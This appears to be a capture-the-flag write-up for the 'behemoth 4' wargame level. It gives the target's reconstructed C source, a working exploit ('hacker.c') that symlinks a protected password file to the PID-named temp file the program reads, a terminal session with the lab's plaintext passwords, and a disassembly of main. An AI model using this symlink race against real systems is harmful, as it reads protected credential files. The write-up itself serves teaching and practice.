behemoth - 04
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
char fname[16]; /* $esp + 0x28 */
char chr; /* $esp + 0x24 */
FILE *fp; /* $esp + 0x20 */
pid_t pid; /* $esp + 0x1c */
pid = getpid();
sprintf(fname, "/tmp/%d", pid);
fp = fopen(fname, "r");
if (fp == NULL) {
puts("PID not found!");
return 0;
}
sleep(1);
puts("Finished sleeping, fgetcing");
while (chr = fgetc(fp)) {
if (chr == EOF) {
fclose(fp);
return 0;
}
putchar(chr);
}
fclose(fp);
return 0;
}
/** hacker.c */
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
pid_t pid;
pid = fork();
if (pid > 0){
char cmd[64] = {0};
snprintf(cmd, 64, "ln -sf /etc/behemoth_pass/behemoth5 /tmp/%d", pid);
system(cmd);
} else if (pid == 0) {
sleep(1);
execle(argv[1], argv[1], NULL, NULL);
}
return 0;
}
root@today:~# ssh [email protected] [email protected]'s password: ietheishei behemoth4@melinda:~$ cd /tmp/shui4 behemoth4@melinda:/tmp/shui4$ ls hacker hacker.c sleep.sh behemoth4@melinda:/tmp/shui4$ gcc hacker.c -o hacker -m32 behemoth4@melinda:/tmp/shui4$ ./hacker /behemoth/behemoth4 behemoth4@melinda:/tmp/shui4$ Finished sleeping, fgetcing aizeeshing ^C
┌─────────────────────────────────────────────────────────────────────────────────┐ │0x80485dd <main> push %ebp │ │0x80485de <main+1> mov %esp,%ebp │ │0x80485e0 <main+3> and $0xfffffff0,%esp │ │0x80485e3 <main+6> sub $0x40,%esp │ │0x80485e6 <main+9> mov %gs:0x14,%eax │ │0x80485ec <main+15> mov %eax,0x3c(%esp) │ │0x80485f0 <main+19> xor %eax,%eax │ │0x80485f2 <main+21> call 0x8048460 <getpid@plt> │ │0x80485f7 <main+26> mov %eax,0x1c(%esp) │ │0x80485fb <main+30> mov 0x1c(%esp),%eax │ │0x80485ff <main+34> mov %eax,0x8(%esp) │ │0x8048603 <main+38> movl $0x8048740,0x4(%esp) │ │0x804860b <main+46> lea 0x28(%esp),%eax │ │0x804860f <main+50> mov %eax,(%esp) │ │0x8048612 <main+53> call 0x80484d0 <sprintf@plt> │ │0x8048617 <main+58> movl $0x8048748,0x4(%esp) │ │0x804861f <main+66> lea 0x28(%esp),%eax │ │0x8048623 <main+70> mov %eax,(%esp) │ │0x8048626 <main+73> call 0x80484a0 <fopen@plt> │ │0x804862b <main+78> mov %eax,0x20(%esp) │ │0x804862f <main+82> cmpl $0x0,0x20(%esp) │ │0x8048634 <main+87> jne 0x8048644 <main+103> │ │0x8048636 <main+89> movl $0x804874a,(%esp) │ │0x804863d <main+96> call 0x8048470 <puts@plt> │ │0x8048642 <main+101> jmp 0x804868d <main+176> │ │0x8048644 <main+103> movl $0x1,(%esp) │ │0x804864b <main+110> call 0x8048440 <sleep@plt> │ │0x8048650 <main+115> movl $0x8048759,(%esp) │ │0x8048657 <main+122> call 0x8048470 <puts@plt> │ │0x804865c <main+127> jmp 0x804866a <main+141> │ │0x804865e <main+129> mov 0x24(%esp),%eax │ │0x8048662 <main+133> mov %eax,(%esp) │ │0x8048665 <main+136> call 0x80484b0 <putchar@plt> │ │0x804866a <main+141> mov 0x20(%esp),%eax │ │0x804866e <main+145> mov %eax,(%esp) │ │0x8048671 <main+148> call 0x80484c0 <fgetc@plt> │ │0x8048676 <main+153> mov %eax,0x24(%esp) │ │0x804867a <main+157> cmpl $0xffffffff,0x24(%esp) │ │0x804867f <main+162> jne 0x804865e <main+129> │ │0x8048681 <main+164> mov 0x20(%esp),%eax │ │0x8048685 <main+168> mov %eax,(%esp) │ │0x8048688 <main+171> call 0x8048430 <fclose@plt> │ │0x804868d <main+176> mov $0x0,%eax │ │0x8048692 <main+181> mov 0x3c(%esp),%edx │ │0x8048696 <main+185> xor %gs:0x14,%edx │ │0x804869d <main+192> je 0x80486a4 <main+199> │ │0x804869f <main+194> call 0x8048450 <__stack_chk_fail@plt> │ │0x80486a4 <main+199> leave │ │0x80486a5 <main+200> ret │ └─────────────────────────────────────────────────────────────────────────────────┘